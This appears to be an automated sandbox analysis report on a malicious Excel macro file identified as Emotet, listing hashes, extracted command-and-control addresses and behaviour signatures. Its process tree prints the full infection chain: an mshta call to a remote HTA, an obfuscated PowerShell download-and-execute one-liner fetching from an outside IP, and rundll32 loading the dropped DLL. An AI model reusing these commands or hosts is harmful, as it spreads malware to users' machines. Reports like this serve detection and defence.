Resubmissions

19-01-2022 07:33

220119-jdxdnafgg4 10

19-01-2022 07:28

220119-jay33sfhfq 10

Analysis

  • max time kernel
    34s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    19-01-2022 07:33

General

  • Target

    d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb.xlsm

  • Size

    114KB

  • MD5

    f8ecaf3d4168b075f418c121a763ae0f

  • SHA1

    cd99515256f845d4b6ca4f8a4f5ff6d0f1d0eff3

  • SHA256

    d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb

  • SHA512

    bb37a13fdef41887f119faf79af415cb14a894f9b5ef757a7be9a665afcd0df5a491b6b4a4bf0ed46c5e6b6a0dcd247ad52e1f94b4567d1287d319ed7459ce60

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/sec.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d145d8bd97ef82aed65a01e30b7523f9380bdef7e4af3cbb706c3fe571d2accb.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:756
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:772
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:996
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:920
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1960
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:888
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ajpkifzf\qihoqee.aro",CSxezx
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1140
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ajpkifzf\qihoqee.aro",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1364

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • \Users\Public\Documents\ssd.dll
    MD5

    d442753a14ebb461110f2fc77e1c8de0

    SHA1

    24002f3f1b60670920478c8cfc4235a8a8443704

    SHA256

    80856abca39547e8707442d21f1761f3cbf4dce9c263c8fb37c1c2ef23ba3073

    SHA512

    9c230a7fa255d3fbef075c4558d647698bccf5101d1b1c5e0ff36cc963039a1a0c021822db866363541da249c98ab75ed1b75602520d8f19a4e59722514c72da

  • memory/756-55-0x00000000718D1000-0x00000000718D3000-memory.dmp
    Filesize

    8KB

  • memory/756-57-0x0000000075531000-0x0000000075533000-memory.dmp
    Filesize

    8KB

  • memory/756-54-0x000000002FD71000-0x000000002FD74000-memory.dmp
    Filesize

    12KB

  • memory/756-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/888-81-0x0000000002280000-0x00000000022A8000-memory.dmp
    Filesize

    160KB

  • memory/888-88-0x00000000028B0000-0x00000000028D8000-memory.dmp
    Filesize

    160KB

  • memory/888-75-0x0000000000220000-0x0000000000248000-memory.dmp
    Filesize

    160KB

  • memory/888-79-0x00000000009A0000-0x00000000009C8000-memory.dmp
    Filesize

    160KB

  • memory/888-83-0x00000000026B0000-0x00000000026D8000-memory.dmp
    Filesize

    160KB

  • memory/888-85-0x0000000002810000-0x0000000002838000-memory.dmp
    Filesize

    160KB

  • memory/996-60-0x00000000022F0000-0x0000000002F3A000-memory.dmp
    Filesize

    12.3MB

  • memory/996-61-0x00000000022F0000-0x0000000002F3A000-memory.dmp
    Filesize

    12.3MB

  • memory/1364-93-0x0000000000790000-0x00000000007B8000-memory.dmp
    Filesize

    160KB

  • memory/1364-95-0x0000000000940000-0x0000000000968000-memory.dmp
    Filesize

    160KB

  • memory/1364-99-0x0000000002370000-0x0000000002398000-memory.dmp
    Filesize

    160KB

  • memory/1364-101-0x0000000002560000-0x0000000002588000-memory.dmp
    Filesize

    160KB

  • memory/1364-103-0x0000000002720000-0x0000000002748000-memory.dmp
    Filesize

    160KB

  • memory/1364-105-0x0000000002880000-0x00000000028A8000-memory.dmp
    Filesize

    160KB

  • memory/1364-107-0x0000000002930000-0x0000000002958000-memory.dmp
    Filesize

    160KB

  • memory/1364-109-0x0000000002A20000-0x0000000002A48000-memory.dmp
    Filesize

    160KB

  • memory/1364-111-0x0000000002AD0000-0x0000000002AF8000-memory.dmp
    Filesize

    160KB

  • memory/1960-68-0x00000000002F0000-0x0000000000318000-memory.dmp
    Filesize

    160KB